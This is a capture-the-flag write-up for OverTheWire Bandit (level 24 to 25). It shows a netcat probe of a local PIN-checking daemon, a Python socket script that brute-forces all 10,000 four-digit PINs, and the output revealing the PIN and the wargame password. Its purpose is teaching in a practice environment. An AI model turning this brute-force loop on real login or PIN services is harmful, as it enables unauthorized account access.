OverTheWire - Bandit: Level 25 to Level 26

Now, something new comes in game: bruteforcing.

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time

First, let’s check out how the interaction with port 30002 will work. Therefore, we connect to this port and try it out.

1 $ nc localhost 30002
2 I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
3 $ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1234
4 Wrong! Please enter the correct pincode. Try again.
5 $ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
6 Wrong! Please enter the correct pincode. Try again.

Since python3 is installed and usable, we can create a small python script to connect to the port and bruteforce the pin.

import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as con:
	con.connect(('127.0.0.1', 30002))
	# let's receive the welcome message
	msg = con.recv(255).decode()
	for pin in range(0, 10000):
		# For some Monitoring we print a message every 500 pins
		if pin % 500 == 0:
			print(f"reached pin {pin:04d}")
		# Preparing our bruteforce string
		# The pin, simply an integer, is prepended with zeros
		# to match the expected format of a 4-digit pin
		to_send = f"VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar {pin:04d}\n"
		con.sendall(to_send.encode())
		# About 250 bytes should be enough to receive at once.
		msg = con.recv(250).decode()
		# Since we do not know yet how the message looks like 
		# in case of success, we simply check for the 
		# non successful message. If it is not received
		# we expect to be successful.
		if not "Wrong!" in msg:
			print(to_send)
			print("leads to:")
			print(msg)
			break

Again, we create a temporary file under /tmp/ to store the script and then execute it. This takes some time, so one can grep some coffee and cake.

1 $ python3 /tmp/shoujin24.py
2 reached pin 0000
3 reached pin 0500
4 reached pin 1000
5 reached pin 1500
6 reached pin 2000
7 reached pin 2500
8 reached pin 3000
9 reached pin 3500
10 reached pin 4000
11 reached pin 4500
12 reached pin 5000
13 reached pin 5500
14 reached pin 6000
15 reached pin 6500
16 reached pin 7000
17 reached pin 7500
18 reached pin 8000
19 reached pin 8500
20 reached pin 9000
21 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9015
22 
23 leads to:
24 Correct!
25 The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
26 
27 Exiting.

There it is! The pin is 9015 and the password of bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d.

Kategorien: #/writeups/; #/overthewire/

Tags: #/security/; #/hacking/; #/bash/; #/linux/; #/ctf/

1	$ nc localhost 30002
2	I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
3	$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1234
4	Wrong! Please enter the correct pincode. Try again.
5	$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
6	Wrong! Please enter the correct pincode. Try again.

1	$ python3 /tmp/shoujin24.py
2	reached pin 0000
3	reached pin 0500
4	reached pin 1000
5	reached pin 1500
6	reached pin 2000
7	reached pin 2500
8	reached pin 3000
9	reached pin 3500
10	reached pin 4000
11	reached pin 4500
12	reached pin 5000
13	reached pin 5500
14	reached pin 6000
15	reached pin 6500
16	reached pin 7000
17	reached pin 7500
18	reached pin 8000
19	reached pin 8500
20	reached pin 9000
21	VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9015
22
23	leads to:
24	Correct!
25	The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
26
27	Exiting.